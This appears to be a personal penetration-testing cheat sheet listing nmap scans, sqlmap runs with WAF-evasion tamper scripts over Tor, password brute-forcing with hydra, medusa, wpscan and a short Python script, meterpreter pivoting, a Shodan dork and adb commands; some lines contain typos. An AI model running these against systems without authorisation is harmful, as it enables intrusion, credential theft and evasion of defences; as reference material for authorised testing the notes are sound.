Will be updated occasionally.
nmap -sS -A -sC -sV -p- --min-rate 5000 [IP]
nmap -sC -sV -sU -top-ports=20 [IP]
nmap -sn [IP/CIDR]
nmap -sn -iL file.txt
nmap -pn -o [IP]
sqlmap -u --risk 3 --level 3 --random-agent --flush-session --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5
ffuf -w "urls.txt:URL" -w params.txt -u hhtps://URL/FUZZ
ip route add 192.168.222.0/24 via 10.175.34.1
import requests
from bs4 import BeautifulSoup
url='http://localhost/token/index.html'
username='anon'
password_dict="password_dictionary.txt"
timeout=5
# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]
for password in lines:
print("Trying with password: ",password)
auth = requests.auth.HTTPBasicAuth(username, password)
resp = requests.get(url=url, auth=auth, verify=False, timeout=timeout)
if "Authorization Required" not in str(resp.text):
print("Login successful with password: ",password)
soup = BeautifulSoup(resp.text, 'html.parser')
break
print(soup.prettify())
fping -a -g 10.10.200.0/24 2>/dev/null
meterpreter> run autoroute -s 192.69.228.0 -n 255.255.255.0
country:id http.title:"Index of /" + !Content-Length:207 + !Content-Length:623 + !Content-Length:447 + !Content-Length:481 + !Content-Length:529 + !Content-Length:770 + !Content-Length:558 + !Content-Length:556 + !Content-Length:555 + !Content-Length:683
openssl genrsa 4096 > domain.key
openssl req -new -key domain.key -out domain.csr
openssl pkcs12 -in creds.pfx -clcerts -nokeys -out azmi-actalist.crt
echo -n | openssl s_client -connect azmi.my.id:443 -servername azmi.my.id | openssl x509 > azmi.cert
openssl x509 -req -in server.csr -CA cloudflare.crt -CAkey server.key -CAcreateserial -out hasil.crt -days 500 -sha256
medusa -h [IP ADRESS] -u [USER] -P [WORDLISTS] -M ssh -n 22
medusa -v 6 -h h[IP ADRESS] -U [USER WORDLISTS] -P [WORDLISTS] -M ftp
hydra -l <username> -P <full path to pass> 10.10.196.192 -t 4 ssh
hydra -l <username> -P <wordlist> 10.10.196.192 http-post-form "/:[POSTDATA ^USER^ ^PASS^]:F=[INCORRECT MESSAGE]" -V
Scan OS:
nmap -O [IP ADRESS]/24 / nmap -A [IP ADRESS]/24
SCAN TCP NULL
nmap -sN -T4 -A [IP ADRESS]
wpscan –url [website] –passwords [wordlists] –usernames [user] –max-threads 50
Android Connection:
adb connect ip:port
adb shell
cd sdcard